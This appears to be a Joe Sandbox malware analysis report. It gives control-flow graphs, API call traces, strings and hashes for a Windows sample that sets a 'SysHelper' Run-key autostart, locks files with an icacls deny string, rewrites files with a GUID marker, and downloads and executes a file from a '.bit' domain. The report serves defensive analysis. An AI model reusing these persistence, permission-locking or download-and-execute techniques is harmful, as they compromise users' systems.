                                                                                                control_flow_graph 2452 40fb98-40fb9f 2453 40fba0-40fbb9 2452->2453 2453->2453 2454 40fbbb-40fbcf 2453->2454 2455 40fbd1 2454->2455 2456 40fbd3-40fc02 PathAppendW call 418400 2454->2456 2455->2456 2459 40fc04-40fc0c call 422587 2456->2459 2460 40fc0f-40fc29 2456->2460 2459->2460 2462 40fc49-40fc4c 2460->2462 2463 40fc2b-40fc2f 2460->2463 2466 40fc4f-40fc6b PathFileExistsW 2462->2466 2465 40fc31-40fc47 call 4205a0 2463->2465 2463->2466 2465->2466 2468 40fc6d-40fc86 call 420c62 2466->2468 2469 40fcdf-40fce5 2466->2469 2478 40fc88 2468->2478 2479 40fc8a-40fc9f lstrcpyW 2468->2479 2471 40fcf0-40fd07 call 417140 2469->2471 2472 40fce7-40fced call 422587 2469->2472 2481 40fd09 2471->2481 2482 40fd0b-40fd20 FindFirstFileW 2471->2482 2472->2471 2478->2479 2483 40fca1 2479->2483 2484 40fca3-40fcdc lstrcatW call 414690 call 40f0e0 call 420bed 2479->2484 2481->2482 2485 40fd30-40fd4c 2482->2485 2486 40fd22-40fd2d call 422587 2482->2486 2483->2484 2484->2469 2490 40fd52-40fd55 2485->2490 2491 410072-410076 2485->2491 2486->2485 2496 40fd60-40fd6b 2490->2496 2492 410086-4100a4 2491->2492 2493 410078-410083 call 422587 2491->2493 2498 4100b1-4100c9 2492->2498 2499 4100a6-4100ae call 422587 2492->2499 2493->2492 2501 40fd70-40fd76 2496->2501 2505 4100d6-4100ee 2498->2505 2506 4100cb-4100d3 call 422587 2498->2506 2499->2498 2507 40fd96-40fd98 2501->2507 2508 40fd78-40fd7b 2501->2508 2520 4100f0-4100f8 call 422587 2505->2520 2521 4100fb-41010b 2505->2521 2506->2505 2515 40fd9b-40fd9d 2507->2515 2512 40fd92-40fd94 2508->2512 2513 40fd7d-40fd85 2508->2513 2512->2515 2513->2507 2519 40fd87-40fd90 2513->2519 2516 410052-410065 FindNextFileW 2515->2516 2517 40fda3-40fdae 2515->2517 2516->2496 2523 41006b-41006c FindClose 2516->2523 2522 40fdb0-40fdb6 2517->2522 2519->2501 2519->2512 2520->2521 2526 40fdd6-40fdd8 2522->2526 2527 40fdb8-40fdbb 2522->2527 2523->2491 2530 40fddb-40fddd 2526->2530 2528 40fdd2-40fdd4 2527->2528 2529 40fdbd-40fdc5 2527->2529 2528->2530 2529->2526 2531 40fdc7-40fdd0 2529->2531 2530->2516 2532 40fde3-40fdea 2530->2532 2531->2522 2531->2528 2533 40fdf0-40fe71 call 417140 call 415ae0 call 414690 call 413b70 2532->2533 2534 40fec2-40fecc 2532->2534 2556 40fe81-40fea9 2533->2556 2557 40fe73-40fe7e call 422587 2533->2557 2536 40feda-40fede 2534->2536 2537 40fece-40fed5 call 411ab0 2534->2537 2536->2516 2540 40fee4-40ff13 call 414690 2536->2540 2537->2536 2545 40ff15-40ff17 2540->2545 2546 40ff19-40ff1f 2540->2546 2548 40ff31-40ff6a call 415ae0 PathFindExtensionW 2545->2548 2549 40ff22-40ff2b 2546->2549 2558 40ff9a-40ffa8 2548->2558 2559 40ff6c 2548->2559 2549->2549 2552 40ff2d-40ff2f 2549->2552 2552->2548 2556->2516 2563 40feaf-40febd call 422587 2556->2563 2557->2556 2561 40ffda-40ffde 2558->2561 2562 40ffaa 2558->2562 2564 40ff70-40ff74 2559->2564 2570 40ffe0-40ffe9 2561->2570 2571 41003a-410042 2561->2571 2566 40ffb0-40ffb4 2562->2566 2563->2516 2568 40ff76-40ff78 2564->2568 2569 40ff7a 2564->2569 2572 40ffb6-40ffb8 2566->2572 2573 40ffba 2566->2573 2575 40ff7c-40ff88 call 421c02 2568->2575 2569->2575 2578 40ffeb 2570->2578 2579 40ffed-40fff9 call 421c02 2570->2579 2576 410044-41004c call 422587 2571->2576 2577 41004f 2571->2577 2581 40ffbc-40ffce call 421c02 2572->2581 2573->2581 2590 40ff93 2575->2590 2591 40ff8a-40ff8f 2575->2591 2576->2577 2577->2516 2578->2579 2579->2571 2588 40fffb-41000b 2579->2588 2581->2571 2595 40ffd0-40ffd5 2581->2595 2593 41000d 2588->2593 2594 41000f-410026 call 421c02 2588->2594 2592 40ff97 2590->2592 2591->2564 2596 40ff91 2591->2596 2592->2558 2593->2594 2594->2571 2600 410028-410035 call 4111c0 2594->2600 2595->2566 2598 40ffd7 2595->2598 2596->2592 2598->2561 2600->2571
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 3232302685-0
                                                                                                • Opcode ID: 33fdd23273d2b7a8768c953ed0cfbb6ad2ff33047ae320ef19d28915fe5359b8
                                                                                                • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                • Opcode Fuzzy Hash: 33fdd23273d2b7a8768c953ed0cfbb6ad2ff33047ae320ef19d28915fe5359b8
                                                                                                • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 985 411cd0-411d1a call 42f7c0 RegOpenKeyExW 988 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 985->988 989 412207-412216 985->989 992 411d93-411d9c 988->992 993 411d8f-411d91 988->993 995 411da0-411da9 992->995 994 411daf-411dcb call 415c10 993->994 999 411dd1-411df8 lstrlenA call 413520 994->999 1000 411e7c-411e87 994->1000 995->995 996 411dab-411dad 995->996 996->994 1007 411e28-411e2c 999->1007 1008 411dfa-411dfe 999->1008 1002 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 411e89-411e91 call 422587 1000->1003 1012 411f36-411f38 1002->1012 1013 411f3a-411f3f 1002->1013 1003->1002 1010 411e3c-411e50 PathFileExistsW 1007->1010 1011 411e2e-411e39 call 422587 1007->1011 1014 411e00-411e08 call 422587 1008->1014 1015 411e0b-411e23 call 4145a0 1008->1015 1010->1000 1020 411e52-411e57 1010->1020 1011->1010 1018 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 1012->1018 1019 411f40-411f49 1013->1019 1014->1015 1015->1007 1032 411f98-411fa0 1018->1032 1033 411fce-411fe9 1018->1033 1019->1019 1023 411f4b-411f4d 1019->1023 1024 411e59-411e5e 1020->1024 1025 411e6a-411e6e 1020->1025 1023->1018 1024->1025 1028 411e60-411e65 call 414690 1024->1028 1025->989 1030 411e74-411e77 1025->1030 1028->1025 1034 4121ff-412204 call 422587 1030->1034 1037 411fa2-411fa4 1032->1037 1038 411fa6-411faf 1032->1038 1035 411feb-411fed 1033->1035 1036 411fef-411ff8 1033->1036 1034->989 1040 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1035->1040 1041 412000-412009 1036->1041 1042 411fbf-411fc9 call 415c10 1037->1042 1044 411fb0-411fb9 1038->1044 1050 4121d1-4121d5 1040->1050 1051 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1040->1051 1041->1041 1046 41200b-41200d 1041->1046 1042->1033 1044->1044 1048 411fbb-411fbd 1044->1048 1046->1040 1048->1042 1052 4121e2-4121fa 1050->1052 1053 4121d7-4121df call 422587 1050->1053 1059 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1059 1060 412109-412110 call 413260 1051->1060 1052->989 1056 4121fc 1052->1056 1053->1052 1056->1034 1064 4121b2-4121b8 1059->1064 1065 4121aa-4121b0 GetLastError 1059->1065 1060->1059 1066 4121c0-4121cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                • _memset.LIBCMT ref: 00411D3B
                                                                                                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                • _memset.LIBCMT ref: 00412090
                                                                                                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                • _memset.LIBCMT ref: 00412120
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                • API String ID: 2589766509-1182136429
                                                                                                • Opcode ID: f30dcf34bb53c62781887ac512f0ce1bbcccb481947f0b90ad033f80d1989b84
                                                                                                • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                • Opcode Fuzzy Hash: f30dcf34bb53c62781887ac512f0ce1bbcccb481947f0b90ad033f80d1989b84
                                                                                                • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1067 4111c0-41121d CreateFileW 1068 411223-411232 GetFileSizeEx 1067->1068 1069 4118eb-4118fb 1067->1069 1070 4112a3-4112be VirtualAlloc 1068->1070 1071 411234 1068->1071 1072 4112c0-4112d5 call 42b420 1070->1072 1073 41131a-411331 CloseHandle 1070->1073 1074 411236-41123a 1071->1074 1075 41123c-411281 CloseHandle call 413100 call 4159d0 MoveFileW 1071->1075 1080 4113b1 1072->1080 1081 4112db-4112de 1072->1081 1074->1070 1074->1075 1075->1069 1091 411287-4112a2 call 422587 1075->1091 1085 4113b7-4113ef SetFilePointer 1080->1085 1083 4112e0-4112e3 1081->1083 1084 4112e9-41130a SetFilePointerEx 1081->1084 1083->1080 1083->1084 1087 411332-41134d ReadFile 1084->1087 1088 41130c-411314 VirtualFree 1084->1088 1089 4113f5-41140d ReadFile 1085->1089 1090 4115bf 1085->1090 1087->1088 1092 41134f-411354 1087->1092 1088->1073 1093 411440-411445 1089->1093 1094 41140f-41143f VirtualFree CloseHandle call 412d50 1089->1094 1095 4115c5-4115d9 SetFilePointerEx 1090->1095 1092->1088 1097 411356-411359 1092->1097 1093->1090 1099 41144b-41146b 1093->1099 1095->1094 1100 4115df-4115eb 1095->1100 1097->1085 1102 41135b-411377 call 412c40 call 417060 1097->1102 1104 411471-4115a8 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40c5c0 call 412d10 call 412d50 call 40bbd0 call 40bd50 call 413ff0 call 412f70 call 40c070 SetFilePointer 1099->1104 1105 411718-4117d9 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40bbd0 call 40bd50 call 412f70 call 40c070 1099->1105 1106 4115ed-4115fc WriteFile 1100->1106 1107 41160e-411643 call 4130b0 call 412840 1100->1107 1127 4113a7-4113af call 412d50 1102->1127 1128 411379-4113a6 VirtualFree CloseHandle call 412d50 1102->1128 1185 4117e1-41182e call 412d50 call 412c40 call 412bf0 call 40cba0 1104->1185 1195 4115ae-4115ba call 412d50 * 2 1104->1195 1105->1185 1106->1094 1112 411602-41160b call 422110 1106->1112 1130 411645 1107->1130 1131 411647-41165a WriteFile call 412d50 1107->1131 1112->1107 1127->1085 1130->1131 1131->1094 1144 411660-411680 lstrlenA WriteFile 1131->1144 1144->1094 1147 411686-4116de CloseHandle call 413100 call 4159d0 MoveFileW 1144->1147 1161 4116e4-411717 VirtualFree call 413210 call 412d50 1147->1161 1162 4118a7-4118d3 call 413210 call 412d50 1147->1162 1183 4118e3-4118e6 1162->1183 1184 4118d5-4118dd VirtualFree 1162->1184 1183->1069 1187 4118e8-4118e9 CloseHandle 1183->1187 1184->1183 1203 411830-411832 1185->1203 1204 41186e-4118a6 VirtualFree CloseHandle call 412d50 * 2 1185->1204 1187->1069 1195->1090 1203->1204 1205 411834-41185b WriteFile 1203->1205 1205->1204 1207 41185d-411869 call 412d50 1205->1207 1207->1095
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00411277
                                                                                                • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004112B1
                                                                                                • _memset.LIBCMT ref: 004112C8
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00411301
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411314
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041131B
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00411349
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00411381
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00411388
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004113E6
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00411409
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411417
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041141E
                                                                                                • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00411471
                                                                                                • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00411491
                                                                                                • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004114CF
                                                                                                • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0041159D
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115D0
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115F8
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00411649
                                                                                                • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041166B
                                                                                                • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411678
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0041168D
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 004116D6
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004116EB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                • API String ID: 254274740-1186676987
                                                                                                • Opcode ID: fc417cf10e22a9ebc44c69cf1f23fe37d3948a75a8138bb95fee337126ac7da9
                                                                                                • Instruction ID: 4b60432aefe4dd0e03df0e566fa74873db0e7dc4ed90acce11ed2be1fb3b5442
                                                                                                • Opcode Fuzzy Hash: fc417cf10e22a9ebc44c69cf1f23fe37d3948a75a8138bb95fee337126ac7da9
                                                                                                • Instruction Fuzzy Hash: E7229F70E00209EBDB10EBA5DC85FEEB7B8EF05304F10416AE519B7291DB785A85CB69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1412 41dbd0-41dcea call 42f7c0 call 413ff0 call 4156d0 call 413ff0 call 40ecb0 1423 41dcf0-41dd82 LoadLibraryW GetProcAddress call 413c40 UuidCreate UuidToStringA 1412->1423 1424 41e459-41e45f 1412->1424 1441 41dd84-41dd86 1423->1441 1442 41dd88-41dd8d 1423->1442 1426 41e461-41e465 1424->1426 1427 41e498-41e4a0 1424->1427 1429 41e467-41e46b 1426->1429 1430 41e48f-41e495 call 422587 1426->1430 1431 41e4b1-41e4c7 1427->1431 1432 41e4a2-41e4ae call 422587 1427->1432 1433 41e477-41e48d 1429->1433 1434 41e46d-41e474 call 422587 1429->1434 1430->1427 1432->1431 1433->1429 1433->1430 1434->1433 1444 41dd99-41de83 call 4156d0 RpcStringFreeA PathAppendA CreateDirectoryA call 4184e0 call 413ff0 call 412900 call 413580 1441->1444 1445 41dd90-41dd95 1442->1445 1457 41de85-41de91 call 422587 1444->1457 1458 41de94-41de99 1444->1458 1445->1445 1446 41dd97 1445->1446 1446->1444 1457->1458 1460 41e3da-41e3e2 1458->1460 1461 41de9f-41dea3 1458->1461 1463 41e3f3-41e419 1460->1463 1464 41e3e4-41e3f0 call 422587 1460->1464 1465 41dea7-41debc call 414300 1461->1465 1467 41e41b-41e427 call 422587 1463->1467 1468 41e42a-41e44a 1463->1468 1464->1463 1476 41ded0-41df5a call 42b420 InternetOpenA call 413ff0 call 412900 call 421c02 1465->1476 1477 41debe-41dec2 1465->1477 1467->1468 1473 41e455 1468->1473 1474 41e44c-41e452 call 422587 1468->1474 1473->1424 1474->1473 1491 41e031-41e075 call 414690 call 412840 1476->1491 1492 41df60-41df9c call 414690 call 40dd40 1476->1492 1480 41dec4-41dec6 1477->1480 1481 41dec8 1477->1481 1484 41deca-41dece 1480->1484 1481->1484 1484->1476 1501 41e077 1491->1501 1502 41e079-41e08b InternetOpenUrlA 1491->1502 1503 41e014-41e01c 1492->1503 1504 41df9e-41dfa3 1492->1504 1501->1502 1505 41e08d-41e099 call 422587 1502->1505 1506 41e09c-41e0bc 1502->1506 1507 41e02d 1503->1507 1508 41e01e-41e02a call 422587 1503->1508 1509 41dfb1-41dfcc 1504->1509 1510 41dfa5-41dfae call 422587 1504->1510 1505->1506 1514 41e0e2-41e11b HttpQueryInfoW 1506->1514 1515 41e0be-41e0cb 1506->1515 1507->1491 1508->1507 1511 41dfe7-41dfed 1509->1511 1512 41dfce-41dfd2 1509->1512 1510->1509 1519 41dff3-41e011 1511->1519 1512->1519 1520 41dfd4-41dfe5 call 4205a0 1512->1520 1514->1515 1525 41e11d-41e15f call 413ff0 call 41e5b0 1514->1525 1522 41e0d1-41e0dd call 422587 1515->1522 1523 41e3c2-41e3cd 1515->1523 1519->1503 1520->1519 1522->1523 1523->1465 1526 41e3d3 1523->1526 1535 41e161-41e16f 1525->1535 1536 41e174-41e19f call 41e5b0 call 413010 1525->1536 1526->1460 1535->1536 1541 41e1a1-41e1a6 1536->1541 1542 41e1d3-41e1db 1536->1542 1543 41e1b4-41e1ce call 413d40 1541->1543 1544 41e1a8-41e1b1 call 422587 1541->1544 1545 41e1dd-41e1e9 call 422587 1542->1545 1546 41e1ec-41e248 lstrcpyA PathAppendA 1542->1546 1543->1542 1544->1543 1545->1546 1548 41e24a-41e24c 1546->1548 1549 41e24e-41e250 1546->1549 1553 41e25c-41e293 call 4156d0 CreateFileA 1548->1553 1554 41e253-41e258 1549->1554 1559 41e353-41e358 1553->1559 1560 41e299-41e2a9 SetFilePointer 1553->1560 1554->1554 1556 41e25a 1554->1556 1556->1553 1561 41e366-41e380 1559->1561 1562 41e35a-41e363 call 422587 1559->1562 1560->1559 1563 41e2af 1560->1563 1565 41e382-41e38b call 422587 1561->1565 1566 41e38e-41e3b0 1561->1566 1562->1561 1567 41e2b1-41e2cf InternetReadFile 1563->1567 1565->1566 1572 41e3b2-41e3bb call 422587 1566->1572 1573 41e3be 1566->1573 1570 41e2d1-41e2da 1567->1570 1571 41e314 1567->1571 1570->1571 1576 41e2dc-41e303 WriteFile 1570->1576 1574 41e316-41e32e CloseHandle InternetCloseHandle * 2 1571->1574 1572->1573 1573->1523 1574->1559 1579 41e330-41e332 1574->1579 1576->1574 1580 41e305-41e310 1576->1580 1579->1559 1582 41e334-41e34d ShellExecuteA 1579->1582 1580->1567 1581 41e312 1580->1581 1581->1574 1582->1559
                                                                                                APIs
                                                                                                  • Part of subcall function 0040ECB0: _strtok.LIBCMT ref: 0040ED66
                                                                                                • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041DCF5
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0041DD01
                                                                                                  • Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83
                                                                                                • UuidCreate.RPCRT4(?), ref: 0041DD3C
                                                                                                • UuidToStringA.RPCRT4(?,?), ref: 0041DD57
                                                                                                • RpcStringFreeA.RPCRT4(00000000), ref: 0041DDB4
                                                                                                • PathAppendA.SHLWAPI(?,00000000), ref: 0041DDD3
                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 0041DDDC
                                                                                                • _memset.LIBCMT ref: 0041DEE7
                                                                                                • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0041DEFC
                                                                                                  • Part of subcall function 00412900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966
                                                                                                • _wcsstr.LIBCMT ref: 0041DF50
                                                                                                • InternetOpenUrlA.WININET(00000000,00000000), ref: 0041E07B
                                                                                                  • Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DD8D
                                                                                                  • Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DDB6
                                                                                                  • Part of subcall function 0040DD40: _memset.LIBCMT ref: 0040DDE4
                                                                                                  • Part of subcall function 0040DD40: lstrlenW.KERNEL32(?), ref: 0040DE0A
                                                                                                  • Part of subcall function 0040DD40: gethostbyname.WS2_32(00500134), ref: 0040DEA7
                                                                                                • _memmove.LIBCMT ref: 0041DFDD
                                                                                                • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 0041E10D
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041E229
                                                                                                • PathAppendA.SHLWAPI(?,?), ref: 0041E23F
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 0041E288
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E2A0
                                                                                                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0041E2C7
                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0041E2FB
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041E317
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041E324
                                                                                                • InternetCloseHandle.WININET(?), ref: 0041E32A
                                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0041E34D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                                                                                                • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                                                                                                • API String ID: 1843630811-800396732
                                                                                                • Opcode ID: ca850b2eb009462475f127208bacb838d615e8d3594796a4f1df8c7af514e1a1
                                                                                                • Instruction ID: dcf8a581e05b5da13000ef7a953c2c15a8b95d2250363c4482f8ef8be3b44f4c
                                                                                                • Opcode Fuzzy Hash: ca850b2eb009462475f127208bacb838d615e8d3594796a4f1df8c7af514e1a1
                                                                                                • Instruction Fuzzy Hash: BF32C070108380EFE730DF25C845B9BBBE4AF85308F10491EF99957291D7BA9589CB9B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
